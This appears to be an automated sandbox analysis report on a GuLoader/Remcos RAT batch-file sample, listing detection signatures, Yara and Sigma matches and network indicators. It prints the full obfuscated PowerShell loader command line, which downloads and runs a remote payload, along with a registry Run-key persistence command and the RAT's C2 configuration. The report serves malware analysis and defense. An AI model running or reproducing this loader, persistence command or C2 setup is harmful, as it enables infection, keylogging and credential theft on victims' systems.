Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SKU_0001710-1-2024-SX-3762.bat

Overview

General Information

Sample name:SKU_0001710-1-2024-SX-3762.bat
Analysis ID:1535955
MD5:fb6e5f4c35e2410abe92acca08412d29
SHA1:3e70e5fa943bf9ba4e2cadd21fc3b03a3ac899b8
SHA256:4f1b5d4bb6d0a7227948fb7ebb7765f3eb4b26288b52356453b74ea530111520
Tags:batuser-TeamDreier
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKU_0001710-1-2024-SX-3762.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6112 cmdline: powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. LobHHugheTribaRet d CoveStatrA skstil [ sj $CentDelimeNazagTendlHuz.uNordtChoniisott wh iHjlpvI,eneCaml]S an= pec$ SkaN G ooFrd dAusce PernBog ');$Nrme=Foreslaa 'Unec$embrO.dspvUnbeeHabirStorsEn.hpp.lyrBr.tiNgtenDemyg lateIn rlKondsTalee tatrKomm.GodsDTricoHolowdc,an.ymplPortoUnpaaDemod SueFGradiBroklTeleeOnch(,ust$tilgSTjrepUmedi BunsHastespeakS aaoComprTilktSku eprictFort,El r$M ltUSyntnFoendCi,ieForlrToeiaPassfHydrkInfelBo b)Ge a ';$Underafkl=$foziness;Heraclitean (Foreslaa 'Etio$,iveGDeioLCucko BruBPe,tAP.olLP,ri:Re,eFIndpLSinuO H moSilisdisqiBreiEKaloS Beg1Narr8.lag6 Acc=Bund(IndgtFon EFormsOlietUnde-Diskp .ulaPro TPa,fh ub A te$Vic,ufyrbNKaradUdfoEBesmR St,aTop.F Hy KForflWa,e) Re ');while (!$Floosies186) {Heraclitean (Foreslaa 'Hoft$IndlgArmllVurdoEr,tbAnmeaV.lul Tux:RedaCPercrMikkeImfcaDisatStrue RemsBjer=Opbe$VisttStarrWhauu M,me Man ') ;Heraclitean $Nrme;Heraclitean (Foreslaa 'S alsforkTPrehA iar d sT,orh- ChrsPro lAnd.EUdm,e BalPCha, Bol4Hvep ');Heraclitean (Foreslaa 'Eth $BiotGFodklDyreoFetibSupeAPjanLPo a:Sem fBlablBasiOdjakOmusoSTirsIMetaeOld SSk o1Chur8 Paa6Eng =Manc(Nonet FatEWh rSSa.et G a-Ov rPRevoaCi,atBoycHvolu Trif$Ref UBombnCamodros eAntiRS peaAltafAgu kTripLHydr)Rece ') ;Heraclitean (Foreslaa 'Cara$ isgHumiL ConomistBunnaAKrumlOpaq:PseugOverlVidnu La T ousCHearh Tek= Pe $Var gAkkoLC mpO GrabPas,aT,lll Gra:Ta.sRstetuDisdtS ciIF,leNE sueSty r SkuE SattDump+Indt+Efte% Mol$PapuMB.agA StaRGrupjH.lduObseNgru STi.f.FremCNatiODebiuSpirn HjrtReka ') ;$Spisekortet=$marjuns[$Glutch];}$khalil=314533;$Humdrumness=30402;Heraclitean (Foreslaa ' ogh$ lgegJernL blnoex,ebPreoaContlTarh:Sa dFTalli MegN MedGphoteO strInteWElitoAs erAttrkPavi Afm= arn SneaGv.gteSlottInds-c itCE,phoNonpN sekTStjeeIndunFisktFast Ret$Nonauunhen ildU grEU hyRhy.oAHedaFFirekIntrlRaad ');Heraclitean (Foreslaa 'Sky $k.ttghonklSalooMiscbF rma dmilT,re:,bjeBB.colMicriAn lcProtkStraeRecoyStoc Disc= Syr nedt[CospSAmp yUnhys FhotBefle kammDamb.TinfCTetroToyinFamivGst eFedtrAuritPneu]R.go:Ayou:DampF Milr omoEx pmIrbiBEfteaYndlsFieleUnmi6Haem4LugeSfngst ronrMassiCabbnPectgExen(Reta$ CreF TiliS otnforkgReumeH.pprBilawImmooHekhrFormk All)Svrt ');Heraclitean (Foreslaa 'Coun$PrecGScanLS.inoKultBlamiaDr,tlYlva:Le,lUGodbPBortH,ounhTrauoStorvEfteE Tid Visi=Du d Fejl[ oths P lyUnemS,necT GloERevimOu.e.Ma stPsameGlycx BevtIacc. VicEHalvNBehacBrylo.lyaDfr diFny n ArgGForb]Frds:ove.:AbscAFormSTrilc Sk.iProei Tru.ScapGBrneEMolatUnbrs hagTIllerAfluiExhon,akkGFun ( S b$ akkbBusmlTr.aI,tancpr bKMange RhoYLo,a)Bron ');Heraclitean (Foreslaa 'pleu$BilaGSpidlSha OUppebPsycaHom LBaha:SkalHKdkrYFlocPBywaETot R SarPPan.YDa rr AssAAssemStimiRedlDHipf=Met $VelvuBiogP MedH dmHLionOAa eVDemoE,ejl.Opris veruTwisbnonoSUt.hT vatR jasIB,adnGli.G,nar(Sel $minik unkhExena OmplCumbIja.bLFork,Inco$ U rhStatuSubsmFolkDKroprmaegUA,grm LatNTylveS,ols LysS ynt) ina ');Heraclitean $Hyperpyramid;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3980 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. LobHHugheTribaRet d CoveStatrA skstil [ sj $CentDelimeNazagTendlHuz.uNordtChoniisott wh iHjlpvI,eneCaml]S an= pec$ SkaN G ooFrd dAusce PernBog ');$Nrme=Foreslaa 'Unec$embrO.dspvUnbeeHabirStorsEn.hpp.lyrBr.tiNgtenDemyg lateIn rlKondsTalee tatrKomm.GodsDTricoHolowdc,an.ymplPortoUnpaaDemod SueFGradiBroklTeleeOnch(,ust$tilgSTjrepUmedi BunsHastespeakS aaoComprTilktSku eprictFort,El r$M ltUSyntnFoendCi,ieForlrToeiaPassfHydrkInfelBo b)Ge a ';$Underafkl=$foziness;Heraclitean (Foreslaa 'Etio$,iveGDeioLCucko BruBPe,tAP.olLP,ri:Re,eFIndpLSinuO H moSilisdisqiBreiEKaloS Beg1Narr8.lag6 Acc=Bund(IndgtFon EFormsOlietUnde-Diskp .ulaPro TPa,fh ub A te$Vic,ufyrbNKaradUdfoEBesmR St,aTop.F Hy KForflWa,e) Re ');while (!$Floosies186) {Heraclitean (Foreslaa 'Hoft$IndlgArmllVurdoEr,tbAnmeaV.lul Tux:RedaCPercrMikkeImfcaDisatStrue RemsBjer=Opbe$VisttStarrWhauu M,me Man ') ;Heraclitean $Nrme;Heraclitean (Foreslaa 'S alsforkTPrehA iar d sT,orh- ChrsPro lAnd.EUdm,e BalPCha, Bol4Hvep ');Heraclitean (Foreslaa 'Eth $BiotGFodklDyreoFetibSupeAPjanLPo a:Sem fBlablBasiOdjakOmusoSTirsIMetaeOld SSk o1Chur8 Paa6Eng =Manc(Nonet FatEWh rSSa.et G a-Ov rPRevoaCi,atBoycHvolu Trif$Ref UBombnCamodros eAntiRS peaAltafAgu kTripLHydr)Rece ') ;Heraclitean (Foreslaa 'Cara$ isgHumiL ConomistBunnaAKrumlOpaq:PseugOverlVidnu La T ousCHearh Tek= Pe $Var gAkkoLC mpO GrabPas,aT,lll Gra:Ta.sRstetuDisdtS ciIF,leNE sueSty r SkuE SattDump+Indt+Efte% Mol$PapuMB.agA StaRGrupjH.lduObseNgru STi.f.FremCNatiODebiuSpirn HjrtReka ') ;$Spisekortet=$marjuns[$Glutch];}$khalil=314533;$Humdrumness=30402;Heraclitean (Foreslaa ' ogh$ lgegJernL blnoex,ebPreoaContlTarh:Sa dFTalli MegN MedGphoteO strInteWElitoAs erAttrkPavi Afm= arn SneaGv.gteSlottInds-c itCE,phoNonpN sekTStjeeIndunFisktFast Ret$Nonauunhen ildU grEU hyRhy.oAHedaFFirekIntrlRaad ');Heraclitean (Foreslaa 'Sky $k.ttghonklSalooMiscbF rma dmilT,re:,bjeBB.colMicriAn lcProtkStraeRecoyStoc Disc= Syr nedt[CospSAmp yUnhys FhotBefle kammDamb.TinfCTetroToyinFamivGst eFedtrAuritPneu]R.go:Ayou:DampF Milr omoEx pmIrbiBEfteaYndlsFieleUnmi6Haem4LugeSfngst ronrMassiCabbnPectgExen(Reta$ CreF TiliS otnforkgReumeH.pprBilawImmooHekhrFormk All)Svrt ');Heraclitean (Foreslaa 'Coun$PrecGScanLS.inoKultBlamiaDr,tlYlva:Le,lUGodbPBortH,ounhTrauoStorvEfteE Tid Visi=Du d Fejl[ oths P lyUnemS,necT GloERevimOu.e.Ma stPsameGlycx BevtIacc. VicEHalvNBehacBrylo.lyaDfr diFny n ArgGForb]Frds:ove.:AbscAFormSTrilc Sk.iProei Tru.ScapGBrneEMolatUnbrs hagTIllerAfluiExhon,akkGFun ( S b$ akkbBusmlTr.aI,tancpr bKMange RhoYLo,a)Bron ');Heraclitean (Foreslaa 'pleu$BilaGSpidlSha OUppebPsycaHom LBaha:SkalHKdkrYFlocPBywaETot R SarPPan.YDa rr AssAAssemStimiRedlDHipf=Met $VelvuBiogP MedH dmHLionOAa eVDemoE,ejl.Opris veruTwisbnonoSUt.hT vatR jasIB,adnGli.G,nar(Sel $minik unkhExena OmplCumbIja.bLFork,Inco$ U rhStatuSubsmFolkDKroprmaegUA,grm LatNTylveS,ols LysS ynt) ina ');Heraclitean $Hyperpyramid;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5172 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 6304 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 764 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 412 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2848 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 888 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1208 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["renajazinw.duckdns.org:53848:1"], "Assigned name": "Nbuild", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JTPTLW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_6112.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_3980.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc320:$b2: ::FromBase64String(
                • 0xb3a0:$s1: -join
                • 0x4b4c:$s4: +=
                • 0x4c0e:$s4: +=
                • 0x8e35:$s4: +=
                • 0xaf52:$s4: +=
                • 0xb23c:$s4: +=
                • 0xb382:$s4: +=
                • 0x15397:$s4: +=
                • 0x15417:$s4: +=
                • 0x154dd:$s4: +=
                • 0x1555d:$s4: +=
                • 0x15733:$s4: +=
                • 0x157b7:$s4: +=
                • 0xbbca:$e4: Get-WmiObject
                • 0xbdb9:$e4: Get-Process
                • 0xbe11:$e4: Start-Process
                • 0x1601c:$e4: Get-Process

                System Summary

                barindex
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 764, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hvidtning81
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6304, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)", ProcessId: 764, ProcessName: reg.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 89.44.138.129, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5172, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5172, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)", ProcessId: 6304, ProcessName: cmd.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru 